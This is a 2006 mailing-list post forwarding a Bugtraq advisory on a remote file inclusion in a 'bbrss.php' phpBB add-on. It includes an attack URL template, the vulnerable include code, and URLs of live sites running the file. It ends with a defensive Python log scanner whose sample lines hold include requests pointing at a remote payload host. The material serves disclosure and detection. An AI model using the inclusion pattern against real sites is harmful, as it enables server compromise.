[VIM] bbrss PhpBB (phpbb_root_path) Remote File Inclusion (fwd)
security curmudgeon
jericho at attrition.org
Mon Jul 24 18:46:30 EDT 2006
http://archives.neohapsis.com/archives/bugtraq/2006-06/0269.html
BID:18432
BID has labeled this "PhpBB BBRSS.PHP Remote File Include Vulnerability"
but checking the 2.0.21 distro at http://www.phpbb.com/downloads.php finds
no "bbrss.php" file in it.
If it is an add-on, it isn't immediately obvious in a Google search. There
were a few hits showing such a file installed on remote hosts:
http://mywebland.com/forums/bbrss.php
<!-- generator="myWebland BBrss 1.0" -->
http://www.10.israel-forum.co.il/forum/bbrss.php
<!-- generator="myWebland BBrss 1.0" -->
http://www.reflectionsindia.org/bapuli/forum/bbrss.php
no HTML comment, but browse up one dir and it isn't a phpBB
install. http://www.reflectionsindia.org/bapuli/forum/
http://www.linuxjuegos.com/foro/bbrss.php
<!-- generator="Linuxjuegos.com" -->
http://www.faito.ru/forum/bbrss.php
<!-- generator="faito forum rss " -->
Maybe relevant post with followup, but can't read:
http://www.iyuanma.com/Safety/9/8994_2006626203432.htm
Did anyone else do analysis? Secunia and SecTracker didn't include it,
it seems.
---------- Forwarded message ----------
From: SpC-x at Bsdmail.Org
To: bugtraq at securityfocus.com
Date: 14 Jun 2006 04:56:46 -0000
Subject: bbrss PhpBB (phpbb_root_path) Remote File Inclusion
######################################################
# bbrss PhpBB (phpbb_root_path) Remote File Inclusion
######################################################
# Credit : SpC-x | The_BeKiR
# Site : http://wWw.SaVSaK.CoM
######################################################
# Greetz :
# | The_BeKiR | Nukedx | Ejder | Str0ke | joffer | Poizonb0x |
######################################################
Remote File Inclusion :
http://www.target.com/path/bbrss.php?phpbb_root_path=Command*Shell
Bbrss.PHP :
<?php
define('IN_PHPBB', true); // to ensure your script works ! //
$phpbb_root_path = './';
// phpBB bootstrap files, resolved relative to $phpbb_root_path
include_once($phpbb_root_path . 'extension.inc');
include_once($phpbb_root_path . 'common.php');
/SpC-x
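The advisory above describes the classic phpBB-add-on remote file inclusion pattern: a request parameter (`phpbb_root_path`) is used as the prefix of an `include_once()` path, so if that parameter can reach the script (e.g. via register_globals) an attacker-controlled URL is included. The durable fix is never to build include paths from request data and to keep register_globals off; in the meantime, web logs show the attempts clearly, because the parameter value carries a URL scheme. The following is an added example, not code from the original post or from phpBB, written from the defender's side: it parses constructed Apache combined-format log lines and flags requests to any `.php` script whose `phpbb_root_path` (or `root_path`) parameter decodes to a remote URL. The log lines, IP addresses and parameter set are assumptions made up for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample log lines (Apache combined format); not taken from the
# original post.  Addresses are from the documentation ranges.
SAMPLE_LOG = """\
203.0.113.5 - - [14/Jun/2006:04:56:46 +0000] "GET /forum/bbrss.php?phpbb_root_path=http://203.0.113.9/x.txt? HTTP/1.1" 200 512 "-" "Mozilla/4.0"
198.51.100.7 - - [14/Jun/2006:05:01:02 +0000] "GET /forum/bbrss.php HTTP/1.1" 200 2048 "-" "FeedReader/1.0"
198.51.100.8 - - [14/Jun/2006:05:02:10 +0000] "GET /forum/viewtopic.php?t=42 HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
203.0.113.5 - - [14/Jun/2006:05:03:33 +0000] "GET /forum/bbrss.php?phpbb_root_path=%68%74%74%70://203.0.113.9/x.txt HTTP/1.1" 200 512 "-" "Mozilla/4.0"
"""

# Minimal combined-log-format parser: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Parameter names that phpBB and its add-ons use as an include-path prefix
# (assumed set; extend it for other applications).
PATH_PARAMS = {"phpbb_root_path", "root_path"}

# Any URL scheme in an include-path prefix is a remote-inclusion signal;
# a legitimate value is a relative directory such as "./".
SCHEME_RE = re.compile(r'^[a-z][a-z0-9+.-]*://', re.IGNORECASE)


def find_rfi_attempts(log_text):
    """Return one record per request whose include-path parameter is a URL."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        parts = urlsplit(m.group("target"))
        if not parts.path.lower().endswith(".php"):
            continue
        # parse_qs percent-decodes once; decode again so double-encoded
        # values (%2568ttp...) are still recognised.
        params = parse_qs(parts.query, keep_blank_values=True)
        for name, values in params.items():
            if name not in PATH_PARAMS:
                continue
            for value in values:
                decoded = unquote(value)
                if SCHEME_RE.match(decoded):
                    hits.append({
                        "ip": m.group("ip"),
                        "ts": m.group("ts"),
                        "script": parts.path,
                        "param": name,
                        "value": decoded,
                        "status": int(m.group("status")),
                    })
    return hits


def by_source(hits):
    """Count flagged requests per client IP, for triage or blocking decisions."""
    counts = {}
    for h in hits:
        counts[h["ip"]] = counts.get(h["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    found = find_rfi_attempts(SAMPLE_LOG)
    for h in found:
        print(f'{h["ts"]} {h["ip"]} {h["script"]} {h["param"]}={h["value"]} -> {h["status"]}')
    print("per source:", by_source(found))
```

Two of the four constructed lines are flagged, both from the same source; the plain RSS fetch and the unrelated viewtopic.php request are left alone. A 200 status on a flagged request only means the script ran, not that the inclusion succeeded, so treat hits as leads for host-side verification (allow_url_include, register_globals, and the add-on's actual code) rather than as confirmed compromise.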